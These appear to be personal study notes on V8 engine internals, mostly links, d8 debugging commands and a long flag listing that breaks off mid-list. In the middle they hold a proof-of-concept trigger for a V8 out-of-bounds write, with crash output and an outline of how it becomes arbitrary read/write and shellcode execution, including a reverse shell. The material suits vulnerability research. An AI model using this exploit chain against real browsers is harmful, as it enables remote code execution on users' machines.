And here is another note:
https://gist.github.com/ofrobots/0bdcab89771221ace68d
More notes:
http://d.hatena.ne.jp/higepon/20090302/1235970545
http://d.hatena.ne.jp/higepon/20110715/1310685988
http://d.hatena.ne.jp/higepon/20110715/1310686097 *
http://d.hatena.ne.jp/higepon/20110719/1311033028
http://d.hatena.ne.jp/higepon/20110720/1311117346
http://d.hatena.ne.jp/higepon/20110723/1311379108
http://d.hatena.ne.jp/higepon/20110724/1311462752
http://d.hatena.ne.jp/higepon/20110726/1311636664
http://d.hatena.ne.jp/higepon/archive?word=v8
Some debugging material
https://github.com/danbev/learning-v8
d8 test.js --ignition --print_bytecode (using ignition)
d8 test.js --print-bytecode (using ignition)
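For trying out the commands above, a minimal test.js could look like the sketch below. The file contents and the function name add are hypothetical and not part of the original notes; which flag spelling works, and what the bytecode dump looks like, depends on the d8 build.

```javascript
// test.js: hypothetical sample input for the d8 commands above.
// A function has to be called at least once, otherwise lazy compilation
// may never produce bytecode for it.
function add(a, b) {
  return a + b;
}

// d8 provides print(); fall back to console.log in other shells (e.g. Node.js).
const out = typeof print === 'function' ? print : console.log;
out(add(1, 2));
```

Keeping the script this small makes it easier to find the bytecode of add in the output, because the dump also covers the top-level script code.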
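Import the gdbinit that ships with V8. It adds support for printing the contents of the various V8 object types, for example the job command, which prints the contents of a V8 JavaScript object.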
http://www.mouseos.com/x64/doc4.html
https://zhuanlan.zhihu.com/p/25122691
https://github.com/v8/v8/wiki/TurboFan
https://stackoverflow.com/questions/277423/how-can-i-see-the-machine-code-generated-by-v8
http://benediktmeurer.de/2017/03/01/v8-behind-the-scenes-february-edition/
http://blog.csdn.net/sunbxonline/article/details/20311545
https://halbecaf.com/2017/05/24/exploiting-a-v8-oob-write/
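// n is deliberately an implicit global: the bug involves the global's property cell.
function Ctor() {
  n = new Set();
}
function Check() {
  n.xyz = 0x826852f4;  // stored as a heap number (see the analysis below)
  parseInt();
}
// Warm up both functions so that they get optimized.
for (var i = 0; i < 2000; ++i) {
  Ctor();
}
for (var i = 0; i < 2000; ++i) {
  Check();
}
// Replace n with a fresh Set that has no properties, then run the optimized store.
Ctor();
Check();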
----Stack
Thread 1 "d8" received signal SIGSEGV, Segmentation fault.
[-------------------------------------code-------------------------------------]
0x736e0a <_ZN2v88internal6String14GetFlatContentEv+106>: test ecx,ecx
0x736e0c <_ZN2v88internal6String14GetFlatContentEv+108>: je 0x736e1a <_ZN2v88internal6String14GetFlatContentEv+122>
0x736e0e <_ZN2v88internal6String14GetFlatContentEv+110>: mov rdi,QWORD PTR [rdi]
=> 0x736e11 <_ZN2v88internal6String14GetFlatContentEv+113>: mov rax,QWORD PTR [rdi]
0x736e14 <_ZN2v88internal6String14GetFlatContentEv+116>: call QWORD PTR [rax+0x20]
0x736e17 <_ZN2v88internal6String14GetFlatContentEv+119>: mov rdi,rax
0x736e1a <_ZN2v88internal6String14GetFlatContentEv+122>: lea rax,[rdi+rbx*2]
0x736e1e <_ZN2v88internal6String14GetFlatContentEv+126>: movabs rcx,0x200000000
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000736e11 in v8::internal::String::GetFlatContent() ()
gdb-peda$ print $rdi
$1 = 0x4141414141414141
First Step
Note that poc.js:5+109 gets the address (0x3fd3734c7d89) of the PROPERTY_CELL_TYPE object that stores the
global variable n . After that, the return value of the Set constructor is written to n .
In the second loop, Check() is optimized into JIT code.
Second Step
Starting at +35 and +45 , the code loads the global variable n , and at +64 it loads the property cell
(a pointer to a FixedArray) of n . At +68 it loads n's first property, and at +72 the number 0x826852f4 is
written to it.
In addition, V8 uses a map to identify an object's type and layout; the map pointer is the first field of the
object. The map of a new Set differs from the map of a Set that has had properties added. In general,
optimized JIT code always checks the map of its target object and deoptimizes if the map has changed.
The problem is that this optimized JIT code does not check the map of the variable n .
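The role of the map check can be illustrated with a toy model in plain JavaScript. This is only a sketch: real V8 maps and property backing stores are internal and not visible to scripts, and every name below (MAP_SET_WITH_XYZ, SHARED_EMPTY_PROPERTIES, storeXyzChecked, and so on) is hypothetical.

```javascript
// Toy model only: real V8 maps and backing stores are internal, not JS-visible.
const MAP_SET_WITH_XYZ = { name: 'Set with property xyz' };
const MAP_EMPTY_SET = { name: 'Set without properties' };

// Stand-in for the single empty FixedArray shared by all property-less objects.
const SHARED_EMPTY_PROPERTIES = [];

function makeObject(map, properties) {
  return { map, properties };
}

// Specialized store WITH the map guard: bails out when the layout differs.
function storeXyzChecked(obj, value, expectedMap) {
  if (obj.map !== expectedMap) {
    return 'deopt'; // fall back to the generic, safe path
  }
  obj.properties[0] = value;
  return 'fast';
}

// Specialized store WITHOUT the guard: blindly writes property slot 0.
function storeXyzUnchecked(obj, value) {
  obj.properties[0] = value;
  return 'fast';
}

// A fresh object whose layout differs from the one the store was specialized for.
const fresh = makeObject(MAP_EMPTY_SET, SHARED_EMPTY_PROPERTIES);

const checkedResult = storeXyzChecked(fresh, 0x826852f4, MAP_SET_WITH_XYZ);
const lengthAfterChecked = SHARED_EMPTY_PROPERTIES.length;

storeXyzUnchecked(fresh, 0x826852f4);
const lengthAfterUnchecked = SHARED_EMPTY_PROPERTIES.length;
```

In this model the guarded store refuses to touch the object, while the unguarded one modifies the shared empty backing store. A JavaScript array simply grows when that happens; a fixed-size array in the engine has no slot 0 to write to, so the store lands on whatever follows it in memory.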
Third Step
After that we call Ctor() once more, so the variable n is set to a new Set that has no properties. In
other words, its properties pointer points to the empty FixedArray, which is initialized when the V8
process starts.
Note that if Ctor() had not been optimized, Check() would be deoptimized as soon as the global
variable n changed.
Finally we call Check() , and the number 0x826852f4 is written to the first element of the empty
FixedArray: an out-of-bounds (OOB) write.
This bug can be triggered with Set , Map , Uint8Array , Uint16Array , etc.
In our PoC, V8 mistakes the null string's map for a heap number and writes the double 0x826852f4
to it, which turns the OneByteString into an ExternalString type. As a result, the data of the string is
treated as a pointer.
So far we have an OOB read/write on the empty FixedArray. As mentioned, the empty FixedArray is initialized at
the beginning of the process. The null String object is located right after it, so we can overwrite the null
string's length to get an info leak.
Besides, I use ab = new ArrayBuffer(0x4000); …; {m.e = ab;} to place the ArrayBuffer's pointer
in the string's content, so I can read out the pointer's address.
We can do three things via this OOB bug.
1. Write a small integer (Smi).
2. Write a heap number.
3. Write an object's pointer.
A small integer is stored in memory as value * 2, because V8 uses the least significant bit to tell whether a
word is a pointer or a number. (This is the 31-bit Smi layout; 64-bit builds of that era shift the value left
by 32 bits instead, with the same tag bit.) A heap number is stored as a pointer to a boxed double, and the
write in my PoC is an example of a heap number write. So we can place an object's pointer and then use a heap
number write to overwrite the structure of that object.
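The tagging arithmetic described above can be sketched in a few lines of JavaScript. This is an illustration under stated assumptions, not V8 code: the helper names (smiRange, fitsInSmi, tagSmi, isTaggedPointer) are hypothetical, and tagSmi implements the 31-bit "value * 2" scheme from the text.

```javascript
// Range of a signed small integer with the given payload width in bits.
function smiRange(bits) {
  return { min: -(2 ** (bits - 1)), max: 2 ** (bits - 1) - 1 };
}

// True if value can be stored inline as a Smi of the given width.
function fitsInSmi(value, bits = 31) {
  const { min, max } = smiRange(bits);
  return Number.isInteger(value) && value >= min && value <= max;
}

// 31-bit scheme from the text: the stored word is value * 2, so its LSB is 0.
function tagSmi(value) {
  if (!fitsInSmi(value, 31)) {
    throw new RangeError('value does not fit in a 31-bit Smi');
  }
  return value * 2;
}

// A word with LSB 1 is treated as a pointer, LSB 0 as a small integer.
function isTaggedPointer(word) {
  return (word & 1) === 1;
}

// Recover the integer from a tagged Smi word.
function untagSmi(word) {
  return word / 2;
}

// The PoC constant is above the signed 32-bit maximum, so it fits in
// neither a 31-bit nor a 32-bit Smi payload.
const pocValueIsSmi = fitsInSmi(0x826852f4, 31) || fitsInSmi(0x826852f4, 32);
```

Since the constant does not fit in a Smi under either width, this is consistent with the PoC's store being a heap number write rather than a small-integer write.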
We use this strategy to modify the ArrayBuffer's length and buffer pointer, which gives us arbitrary
read/write.
Finally we read a function's JIT code pointer, write shellcode over it and call the function.
The shellcode for Chrome calls IPC, and the one for docs is a reverse TCP shell.
All supported d8 options
./d8 --help
SSE3=1 SSE4_1=1 SAHF=1 AVX=1 FMA3=1 BMI1=1 BMI2=1 LZCNT=1 POPCNT=1 ATOM=0
Usage:
  shell [options] -e string
    execute string in V8
  shell [options] file1 file2 ... filek
    run JavaScript scripts in file1, file2, ..., filek
  shell [options]
  shell [options] --shell [file1 file2 ... filek]
    run an interactive JavaScript shell
  d8 [options] file1 file2 ... filek
  d8 [options]
  d8 [options] --shell [file1 file2 ... filek]
    run the new debugging shell
Options:
--experimental_extras (enable code compiled in via v8_experimental_extra_library_files) type: bool default: false --use_strict (enforce strict mode) type: bool default: false --es_staging (enable test-worthy harmony features (for internal use only)) type: bool default: false --harmony (enable all completed harmony features) type: bool default: false --harmony_shipping (enable all shipped harmony features) type: bool default: true --legacy_const (legacy semantics for const in sloppy mode) type: bool default: false --promise_extra (additional V8 Promise functions) type: bool default: true --harmony_object_observe (enable "harmony Object.observe" (in progress)) type: bool default: false --harmony_function_sent (enable "harmony function.sent" (in progress)) type: bool default: false --harmony_sharedarraybuffer (enable "harmony sharedarraybuffer" (in progress)) type: bool default: false --harmony_simd (enable "harmony simd" (in progress)) type: bool default: false --harmony_do_expressions (enable "harmony do-expressions" (in progress)) type: bool default: false --harmony_tailcalls (enable "harmony tail calls" (in progress)) type: bool default: false --harmony_regexp_property (enable "harmony unicode regexp property classes" (in progress)) type: bool default: false --harmony_regexp_lookbehind (enable "harmony regexp lookbehind") type: bool default: false --harmony_instanceof (enable "harmony instanceof support") type: bool default: false --harmony_object_values_entries (enable "harmony Object.values / Object.entries") 
type: bool default: false --harmony_object_own_property_descriptors (enable "harmony Object.getOwnPropertyDescriptors()") type: bool default: false --harmony_array_prototype_values (enable "harmony Array.prototype.values") type: bool default: true --harmony_function_name (enable "harmony Function name inference") type: bool default: true --harmony_iterator_close (enable "harmony iterator finalization") type: bool default: true --harmony_regexps (enable "harmony regular expression extensions") type: bool default: true --harmony_unicode_regexps (enable "harmony unicode regexps") type: bool default: true --harmony_sloppy (enable "harmony features in sloppy mode") type: bool default: true --harmony_sloppy_let (enable "harmony let in sloppy mode") type: bool default: true --harmony_sloppy_function (enable "harmony sloppy function block scoping") type: bool default: true --harmony_proxies (enable "harmony proxies") type: bool default: true --harmony_reflect (enable "harmony Reflect API") type: bool default: true --harmony_regexp_subclass (enable "harmony regexp subclassing") type: bool default: true --harmony_restrictive_declarations (enable "harmony limitations on sloppy mode function declarations") type: bool default: true --harmony_species (enable "harmony Symbol.species") type: bool default: true --compiled_keyed_generic_loads (use optimizing compiler to generate keyed generic load stubs) type: bool default: false --allocation_site_pretenuring (pretenure with allocation sites) type: bool default: true --trace_pretenuring (trace pretenuring decisions of HAllocate instructions) type: bool default: false --trace_pretenuring_statistics (trace allocation site pretenuring statistics) type: bool default: false --track_fields (track fields with only smi values) type: bool default: true --track_double_fields (track fields with double values) type: bool default: true --track_heap_object_fields (track fields with heap values) type: bool default: true --track_computed_fields 
(track computed boilerplate fields) type: bool default: true --track_field_types (track field types) type: bool default: true --smi_binop (support smi representation in binary operations) type: bool default: true --optimize_for_size (Enables optimizations which favor memory size over execution speed) type: bool default: false --unbox_double_arrays (automatically unbox arrays of doubles) type: bool default: true --string_slices (use string slices) type: bool default: true --ignition (use ignition interpreter) type: bool default: false --ignition_filter (filter for ignition interpreter) type: string default: * --print_bytecode (print bytecode generated by ignition interpreter) type: bool default: false --trace_ignition (trace the bytecodes executed by the ignition interpreter) type: bool default: false --trace_ignition_codegen (trace the codegen of ignition interpreter bytecode handlers) type: bool default: false --crankshaft (use crankshaft) type: bool default: true --hydrogen_filter (optimization filter) type: string default: * --use_gvn (use hydrogen global value numbering) type: bool default: true --gvn_iterations (maximum number of GVN fix-point iterations) type: int default: 3 --use_canonicalizing (use hydrogen instruction canonicalizing) type: bool default: true --use_inlining (use function inlining) type: bool default: true --use_escape_analysis (use hydrogen escape analysis) type: bool default: true --use_allocation_folding (use allocation folding) type: bool default: true --use_local_allocation_folding (only fold in basic blocks) type: bool default: false --use_write_barrier_elimination (eliminate write barriers targeting allocations in optimized code) type: bool default: true --max_inlining_levels (maximum number of inlining levels) type: int default: 5 --max_inlined_source_size (maximum source size in bytes considered for a single inlining) type: int default: 600 --max_inlined_nodes (maximum number of AST nodes considered for a single inlining) type: int 
default: 196 --max_inlined_nodes_cumulative (maximum cumulative number of AST nodes considered for inlining) type: int default: 400 --loop_invariant_code_motion (loop invariant code motion) type: bool default: true --fast_math (faster (but maybe less accurate) math functions) type: bool default: true --collect_megamorphic_maps_from_stub_cache (crankshaft harvests type feedback from stub cache) type: bool default: false --hydrogen_stats (print statistics for hydrogen) type: bool default: false --trace_check_elimination (trace check elimination phase) type: bool default: false --trace_environment_liveness (trace liveness of local variable slots) type: bool default: false --trace_hydrogen (trace generated hydrogen to file) type: bool default: false --trace_hydrogen_filter (hydrogen tracing filter) type: string default: * --trace_hydrogen_stubs (trace generated hydrogen for stubs) type: bool default: false --trace_hydrogen_file (trace hydrogen to given file name) type: string default: NULL --trace_phase (trace generated IR for specified phases) type: string default: HLZ --trace_inlining (trace inlining decisions) type: bool default: false --trace_load_elimination (trace load elimination) type: bool default: false --trace_store_elimination (trace store elimination) type: bool default: false --trace_alloc (trace register allocator) type: bool default: false --trace_all_uses (trace all use positions) type: bool default: false --trace_range (trace range analysis) type: bool default: false --trace_gvn (trace global value numbering) type: bool default: false --trace_representation (trace representation types) type: bool default: false --trace_removable_simulates (trace removable simulates) type: bool default: false --trace_escape_analysis (trace hydrogen escape analysis) type: bool default: false --trace_allocation_folding (trace allocation folding) type: bool default: false --trace_track_allocation_sites (trace the tracking of allocation sites) type: bool default: false 
--trace_migration (trace object migration) type: bool default: false --trace_generalization (trace map generalization) type: bool default: false --stress_pointer_maps (pointer map for every instruction) type: bool default: false --stress_environments (environment for every instruction) type: bool default: false --deopt_every_n_times (deoptimize every n times a deopt point is passed) type: int default: 0 --deopt_every_n_garbage_collections (deoptimize every n garbage collections) type: int default: 0 --print_deopt_stress (print number of possible deopt points) type: bool default: false --trap_on_deopt (put a break point before deoptimizing) type: bool default: false --trap_on_stub_deopt (put a break point before deoptimizing a stub) type: bool default: false --deoptimize_uncommon_cases (deoptimize uncommon cases) type: bool default: true --polymorphic_inlining (polymorphic inlining) type: bool default: true --use_osr (use on-stack replacement) type: bool default: true --array_bounds_checks_elimination (perform array bounds checks elimination) type: bool default: true --trace_bce (trace array bounds check elimination) type: bool default: false --array_bounds_checks_hoisting (perform array bounds checks hoisting) type: bool default: false --array_index_dehoisting (perform array index dehoisting) type: bool default: true --analyze_environment_liveness (analyze liveness of environment slots and zap dead values) type: bool default: true --load_elimination (use load elimination) type: bool default: true --check_elimination (use check elimination) type: bool default: true --store_elimination (use store elimination) type: bool default: false --dead_code_elimination (use dead code elimination) type: bool default: true --fold_constants (use constant folding) type: bool default: true --trace_dead_code_elimination (trace dead code elimination) type: bool default: false --unreachable_code_elimination (eliminate unreachable code) type: bool default: true --trace_osr (trace 
on-stack replacement) type: bool default: false --stress_runs (number of stress runs) type: int default: 0 --lookup_sample_by_shared (when picking a function to optimize, watch for shared function info, not JSFunction itself) type: bool default: true --flush_optimized_code_cache (flushes the cache of optimized code for closures on every GC) type: bool default: false --inline_construct (inline constructor calls) type: bool default: true --inline_arguments (inline functions with arguments object) type: bool default: true --inline_accessors (inline JavaScript accessors) type: bool default: true --escape_analysis_iterations (maximum number of escape analysis fix-point iterations) type: int default: 2 --concurrent_recompilation (optimizing hot functions asynchronously on a separate thread) type: bool default: true --trace_concurrent_recompilation (track concurrent recompilation) type: bool default: false --concurrent_recompilation_queue_length (the length of the concurrent compilation queue) type: int default: 8 --concurrent_recompilation_delay (artificial compilation delay in ms) type: int default: 0 --block_concurrent_recompilation (block queued jobs until released) type: bool default: false --omit_map_checks_for_leaf_maps (do not emit check maps for constant values that have a leaf map, deoptimize the optimized code if the layout of the maps changes.) 
type: bool default: true --turbo (enable TurboFan compiler) type: bool default: false --turbo_shipping (enable TurboFan compiler on subset) type: bool default: true --turbo_greedy_regalloc (use the greedy register allocator) type: bool default: false --turbo_sp_frame_access (use stack pointer-relative access to frame wherever possible) type: bool default: false --turbo_preprocess_ranges (run pre-register allocation heuristics) type: bool default: true --turbo_loop_stackcheck (enable stack checks in loops) type: bool default: true --turbo_filter (optimization filter for TurboFan compiler) type: string default: ~~ --trace_turbo (trace generated TurboFan IR) type: bool default: false --trace_turbo_graph (trace generated TurboFan graphs) type: bool default: false --trace_turbo_cfg_file (trace turbo cfg graph (for C1 visualizer) to a given file name) type: string default: NULL --trace_turbo_types (trace TurboFan's types) type: bool default: true --trace_turbo_scheduler (trace TurboFan's scheduler) type: bool default: false --trace_turbo_reduction (trace TurboFan's various reducers) type: bool default: false --trace_turbo_jt (trace TurboFan's jump threading) type: bool default: false --trace_turbo_ceq (trace TurboFan's control equivalence) type: bool default: false --turbo_asm (enable TurboFan for asm.js code) type: bool default: true --turbo_asm_deoptimization (enable deoptimization in TurboFan for asm.js code) type: bool default: false --turbo_verify (verify TurboFan graphs at each phase) type: bool default: true --turbo_stats (print TurboFan statistics) type: bool default: false --turbo_splitting (split nodes during scheduling in TurboFan) type: bool default: true --turbo_types (use typed lowering in TurboFan) type: bool default: true --turbo_source_positions (track source code positions when building TurboFan IR) type: bool default: false --function_context_specialization (enable function context specialization in TurboFan) type: bool default: false 
--native_context_specialization (enable native context specialization in TurboFan) type: bool default: true --turbo_inlining (enable inlining in TurboFan) type: bool default: true --trace_turbo_inlining (trace TurboFan inlining) type: bool default: false --loop_assignment_analysis (perform loop assignment analysis) type: bool default: true --turbo_profiling (enable profiling in TurboFan) type: bool default: false --turbo_verify_allocation (verify register allocation in TurboFan) type: bool default: true --turbo_move_optimization (optimize gap moves in TurboFan) type: bool default: true --turbo_jt (enable jump threading in TurboFan) type: bool default: true --turbo_osr (enable OSR in TurboFan) type: bool default: true --turbo_stress_loop_peeling (stress loop peeling optimization) type: bool default: false --turbo_cf_optimization (optimize control flow in TurboFan) type: bool default: true --turbo_frame_elision (elide frames in TurboFan) type: bool default: true --turbo_cache_shared_code (cache context-independent code) type: bool default: true --turbo_preserve_shared_code (keep context-independent code) type: bool default: false --turbo_escape (enable escape analysis) type: bool default: false --turbo_instruction_scheduling (enable instruction scheduling in TurboFan) type: bool default: false --turbo_stress_instruction_scheduling (randomly schedule instructions to stress dependency tracking) type: bool default: false --expose_wasm (expose WASM interface to JavaScript) type: bool default: false --trace_wasm_encoder (trace encoding of wasm code) type: bool default: false --trace_wasm_decoder (trace decoding of wasm code) type: bool default: false --trace_wasm_decode_time (trace decoding time of wasm code) type: bool default: false --trace_wasm_compiler (trace compiling of wasm code) type: bool default: false --trace_wasm_ast (dump AST after WASM decode) type: bool default: false --wasm_break_on_decoder_error (debug break when wasm decoder encounters an error) type: 
bool default: false --wasm_loop_assignment_analysis (perform loop assignment analysis for WASM) type: bool default: false --enable_simd_asmjs (enable SIMD.js in asm.js stdlib) type: bool default: false --dump_asmjs_wasm (dump Asm.js to WASM module bytes) type: bool default: false --asmjs_wasm_dumpfile (file to dump asm wasm conversion result to) type: string default: asmjs.wasm --typed_array_max_size_in_heap (threshold for in-heap typed array) type: int default: 64 --frame_count (number of stack frames inspected by the profiler) type: int default: 1 --interrupt_budget (execution budget before interrupt is triggered) type: int default: 6144 --type_info_threshold (percentage of ICs that must have type info to allow optimization) type: int default: 25 --generic_ic_threshold (max percentage of megamorphic/generic ICs to allow optimization) type: int default: 30 --self_opt_count (call count before self-optimization) type: int default: 130 --trace_opt_verbose (extra verbose compilation tracing) type: bool default: false --debug_code (generate extra code (assertions) for debugging) type: bool default: false --code_comments (emit comments in code disassembly) type: bool default: false --enable_sse3 (enable use of SSE3 instructions if available) type: bool default: true --enable_sse4_1 (enable use of SSE4.1 instructions if available) type: bool default: true --enable_sahf (enable use of SAHF instruction if available (X64 only)) type: bool default: true --enable_avx (enable use of AVX instructions if available) type: bool default: true --enable_fma3 (enable use of FMA3 instructions if available) type: bool default: true --enable_bmi1 (enable use of BMI1 instructions if available) type: bool default: true --enable_bmi2 (enable use of BMI2 instructions if available) type: bool default: true --enable_lzcnt (enable use of LZCNT instruction if available) type: bool default: true --enable_popcnt (enable use of POPCNT instruction if available) type: bool default: true --enable_vfp3 
(enable use of VFP3 instructions if available) type: bool default: true --enable_armv7 (enable use of ARMv7 instructions if available (ARM only)) type: bool default: true --enable_armv8 (enable use of ARMv8 instructions if available (ARM 32-bit only)) type: bool default: true --enable_neon (enable use of NEON instructions if available (ARM only)) type: bool default: true --enable_sudiv (enable use of SDIV and UDIV instructions if available (ARM only)) type: bool default: true --enable_mls (enable use of MLS instructions if available (ARM only)) type: bool default: true --enable_movw_movt (enable loading 32-bit constant by means of movw/movt instruction pairs (ARM only)) type: bool default: false --enable_unaligned_accesses (enable unaligned accesses for ARMv7 (ARM only)) type: bool default: true --enable_32dregs (enable use of d16-d31 registers on ARM - this requires VFP3) type: bool default: true --enable_vldr_imm (enable use of constant pools for double immediate (ARM only)) type: bool default: false --force_long_branches (force all emitted branches to be in long mode (MIPS/PPC only)) type: bool default: false --mcpu (enable optimization for specific cpu) type: string default: auto --expose_natives_as (expose natives in global object) type: string default: NULL --expose_debug_as (expose debug in global object) type: string default: NULL --expose_free_buffer (expose freeBuffer extension) type: bool default: false --expose_gc (expose gc extension) type: bool default: false --expose_gc_as (expose gc extension under the specified name) type: string default: NULL --expose_externalize_string (expose externalize string extension) type: bool default: false --expose_trigger_failure (expose trigger-failure extension) type: bool default: false --stack_trace_limit (number of stack frames to capture) type: int default: 10 --builtins_in_stack_traces (show built-in functions in stack traces) type: bool default: false --disable_native_files (disable builtin natives files) type: 
bool default: false --inline_new (use fast inline allocation) type: bool default: true --trace_codegen (print name of functions for which code is generated) type: bool default: false --trace (trace function calls) type: bool default: false --mask_constants_with_cookie (use random jit cookie to mask large constants) type: bool default: true --lazy (use lazy compilation) type: bool default: true --trace_opt (trace lazy optimization) type: bool default: false --trace_opt_stats (trace lazy optimization statistics) type: bool default: false --opt (use adaptive optimizations) type: bool default: true --always_opt (always try to optimize functions) type: bool default: false --always_osr (always try to OSR functions) type: bool default: false --prepare_always_opt (prepare for turning on always opt) type: bool default: false --trace_deopt (trace optimize function deoptimization) type: bool default: false --trace_stub_failures (trace deoptimization of generated code stubs) type: bool default: false --serialize_toplevel (enable caching of toplevel scripts) type: bool default: true --serialize_eager (compile eagerly when caching scripts) type: bool default: false --serialize_age_code (pre age code in the code cache) type: bool default: false --trace_serializer (print code serializer trace) type: bool default: false --min_preparse_length (minimum length for automatic enable preparsing) type: int default: 1024 --max_opt_count (maximum number of optimization attempts before giving up.) 
type: int default: 10 --compilation_cache (enable compilation cache) type: bool default: true --cache_prototype_transitions (cache prototype transitions) type: bool default: true --cpu_profiler_sampling_interval (CPU profiler sampling interval in microseconds) type: int default: 1000 --trace_js_array_abuse (trace out-of-bounds accesses to JS arrays) type: bool default: false --trace_external_array_abuse (trace out-of-bounds-accesses to external arrays) type: bool default: false --trace_array_abuse (trace out-of-bounds accesses to all arrays) type: bool default: false --debug_eval_readonly_locals (do not update locals after debug-evaluate) type: bool default: true --trace_debug_json (trace debugging JSON request/response) type: bool default: false --enable_liveedit (enable liveedit experimental feature) type: bool default: true --hard_abort (abort by crashing) type: bool default: true --stack_size (default size of stack region v8 is allowed to use (in kBytes)) type: int default: 984 --max_stack_trace_source_length (maximum length of function source code printed in a stack trace.) type: int default: 300 --always_inline_smi_code (always inline smi code in non-opt code) type: bool default: false --verify_operand_stack_depth (emit debug code that verifies the static tracking of the operand stack depth) type: bool default: false --min_semi_space_size (min size of a semi-space (in MBytes), the new space consists of twosemi-spaces) type: int default: 0 --max_semi_space_size (max size of a semi-space (in MBytes), the new space consists of twosemi-spaces) type: int default: 0 --semi_space_growth_factor (factor by which to grow the new space) type: int default: 2 --experimental_new_space_growth_heuristic (Grow the new space based on the percentage of survivors instead of their absolute value.) 
type: bool default: false --max_old_space_size (max size of the old space (in Mbytes)) type: int default: 0 --initial_old_space_size (initial old space size (in Mbytes)) type: int default: 0 --max_executable_size (max size of executable memory (in Mbytes)) type: int default: 0 --gc_global (always perform global GCs) type: bool default: false --gc_interval (garbage collect after <n> allocations) type: int default: -1 --retain_maps_for_n_gc (keeps maps alive for <n> old space garbage collections) type: int default: 2 --trace_gc (print one trace line following each garbage collection) type: bool default: false --trace_gc_nvp (print one detailed trace line in name=value format after each garbage collection) type: bool default: false --trace_gc_ignore_scavenger (do not print trace line after scavenger collection) type: bool default: false --trace_idle_notification (print one trace line following each idle notification) type: bool default: false --trace_idle_notification_verbose (prints the heap state used by the idle notification) type: bool default: false --print_cumulative_gc_stat (print cumulative GC statistics in name=value format on exit) type: bool default: false --print_max_heap_committed (print statistics of the maximum memory committed for the heap in name=value format on exit) type: bool default: false --trace_gc_verbose (print more details following each garbage collection) type: bool default: false --trace_allocation_stack_interval (print stack trace after <n> free-list allocations) type: int default: -1 --trace_fragmentation (report fragmentation for old space) type: bool default: false --trace_fragmentation_verbose (report fragmentation for old space (detailed)) type: bool default: false --trace_mutator_utilization (print mutator utilization, allocation speed, gc speed) type: bool default: false --weak_embedded_maps_in_optimized_code (make maps embedded in optimized code weak) type: bool default: true --weak_embedded_objects_in_optimized_code (make objects 
embedded in optimized code weak) type: bool default: true --flush_code (flush code that we expect not to use again) type: bool default: true --trace_code_flushing (trace code flushing progress) type: bool default: false --age_code (track un-executed functions to age code and flush only old code (required for code flushing)) type: bool default: true --incremental_marking (use incremental marking) type: bool default: true --min_progress_during_incremental_marking_finalization (keep finalizing incremental marking as long as we discover at least this many unmarked objects) type: int default: 32 --max_incremental_marking_finalization_rounds (at most try this many times to finalize incremental marking) type: int default: 3 --black_allocation (use black allocation) type: bool default: false --concurrent_sweeping (use concurrent sweeping) type: bool default: true --parallel_compaction (use parallel compaction) type: bool default: true --parallel_pointer_update (use parallel pointer update during compaction) type: bool default: true --trace_incremental_marking (trace progress of the incremental marking) type: bool default: false --track_gc_object_stats (track object counts and memory usage) type: bool default: false --trace_gc_object_stats (trace object counts and memory usage) type: bool default: false --track_detached_contexts (track native contexts that are expected to be garbage collected) type: bool default: true --trace_detached_contexts (trace native contexts that are expected to be garbage collected) type: bool default: false --verify_heap (verify heap pointers before and after GC) type: bool default: false --move_object_start (enable moving of object starts) type: bool default: true --memory_reducer (use memory reducer) type: bool default: true --scavenge_reclaim_unmodified_objects (remove unmodified and unreferenced objects) type: bool default: false --heap_growing_percent (specifies heap growing factor as (1 + heap_growing_percent/100)) type: int default: 0 
--histogram_interval (time interval in ms for aggregating memory histograms) type: int default: 600000 --trace_object_groups (print object groups detected during each garbage collection) type: bool default: false --heap_profiler_trace_objects (Dump heap object allocations/movements/size_updates) type: bool default: false --sampling_heap_profiler_suppress_randomness (Use constant sample intervals to eliminate test flakiness) type: bool default: false --use_idle_notification (Use idle notification to reduce memory footprint.) type: bool default: true --use_ic (use inline caching) type: bool default: true --trace_ic (trace inline cache state transitions) type: bool default: false --native_code_counters (generate extra code for manipulating stats counters) type: bool default: false --always_compact (Perform compaction on every full GC) type: bool default: false --never_compact (Never perform compaction on full GC - testing only) type: bool default: false --compact_code_space (Compact code space on full collections) type: bool default: true --cleanup_code_caches_at_gc (Flush inline caches prior to mark compact collection and flush code caches in maps during mark compact cycle.) type: bool default: true --use_marking_progress_bar (Use a progress bar to scan large objects in increments when incremental marking is active.) type: bool default: true --zap_code_space (Zap free memory in code space with 0xCC while sweeping.) type: bool default: true --random_seed (Default seed for initializing random generator (0, the default, means to use system random).) 
type: int default: 0 --trace_weak_arrays (Trace WeakFixedArray usage) type: bool default: false --track_prototype_users (Keep track of which maps refer to a given prototype object) type: bool default: false --trace_prototype_users (Trace updates to prototype user tracking) type: bool default: false --eliminate_prototype_chain_checks (Collapse prototype chain checks into single-cell checks) type: bool default: true --use_verbose_printer (allows verbose printing) type: bool default: true --trace_for_in_enumerate (Trace for-in enumerate slow-paths) type: bool default: false --trace_maps (trace map creation) type: bool default: false --allow_natives_syntax (allow natives syntax) type: bool default: false --trace_parse (trace parsing and preparsing) type: bool default: false --trace_sim (Trace simulator execution) type: bool default: false --debug_sim (Enable debugging the simulator) type: bool default: false --check_icache (Check icache flushes in ARM and MIPS simulator) type: bool default: false --stop_sim_at (Simulator stop after x number of instructions) type: int default: 0 --sim_stack_alignment (Stack alingment in bytes in simulator (4 or 8, 8 is default)) type: int default: 8 --sim_stack_size (Stack size of the ARM64, MIPS64 and PPC64 simulator in kBytes (default is 2 MB)) type: int default: 2048 --log_regs_modified (When logging register values, only print modified registers.) type: bool default: true --log_colour (When logging, try to use coloured output.) type: bool default: true --ignore_asm_unimplemented_break (Don't break for ASM_UNIMPLEMENTED_BREAK macros.) type: bool default: false --trace_sim_messages (Trace simulator debug messages. Implied by --trace-sim.) 
